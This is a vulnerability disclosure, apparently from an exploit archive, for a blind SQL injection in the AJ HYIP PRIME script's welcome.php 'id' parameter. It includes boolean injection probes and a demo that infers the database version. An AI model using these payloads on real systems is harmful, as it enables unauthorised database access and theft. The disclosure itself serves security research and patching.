AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection

Author: JosS
type: webapps
platform: php
port: 
date_added: 2010-07-22  
date_updated: 2010-07-22  
verified: 1  
codes: CVE-2010-2915;OSVDB-66823  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 14435.txt  

AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- site: http://www.ajsquare.com/products/ajhyip/index.php

- about AJ HYIP:

AJ HYIP is a complete financial tool with no technical
knowledge required to manage the site. AJ HYIP software
is the latest and most advanced HYIP Script with excellent
navigation features. Our HYIP Script can be easily customized
to accustom your needs with a potential to generate heavy revenues.


~~ [POC]

http://target/path/welcome.php?id=3 [bSQL]
http://target/path/welcome.php?id=3 and 1=1
http://target/path/welcome.php?id=3 and 1=2

~~ [DEMO]

http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=4
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=5


 __h0__